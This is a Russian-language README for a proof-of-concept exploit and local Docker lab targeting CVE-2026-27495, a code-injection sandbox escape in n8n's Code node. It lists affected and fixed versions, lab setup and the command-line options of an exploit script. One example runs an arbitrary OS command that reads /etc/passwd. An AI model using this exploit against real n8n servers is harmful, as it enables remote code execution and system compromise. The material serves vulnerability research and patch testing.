
PoC-эксплойт и лабораторная среда для CVE-2026-27495
| CVE | CVE-2026-27495 |
| CVSS | 9.4 (критический) |
| CWE | CWE-94 — внедрение кода |
| Затронуто | n8n < 1.123.22 / 2.0.0–2.9.2 / 2.10.0 |
| Исправлено | 1.123.22 / 2.9.3 / 2.10.1 |
| Поверхность атаки | Code node (требуется аутентификация, Task Runners включены) |
docker compose up -d
Подождите ~15 секунд, пока n8n запустится, затем откройте http://localhost:5678 и создайте учётную запись владельца (email: [email protected], пароль: TestPassword123!).
pip install requests
Проверка обхода песочницы:
python3 exploit.py --probe
RCE — раскомментируйте NODE_FUNCTION_ALLOW_BUILTIN=* в docker-compose.yml и перезапустите:
docker compose down && docker compose up -d
python3 exploit.py --cmd "id && cat /etc/passwd"
Первичная настройка (создаёт учётную запись владельца автоматически):
python3 exploit.py --setup --probe
Options:
--url URL n8n base URL (default: http://localhost:5678)
--email EMAIL Login email (default: [email protected])
--password PASSWORD Login password
--cmd CMD OS command to execute (RCE)
--setup Create owner account (fresh instance)
--probe Probe sandbox escape only (no RCE, works with any config)
--proxy PROXY HTTP proxy (e.g. http://127.0.0.1:8080)
Только для авторизованных исследований в области безопасности и в образовательных целях.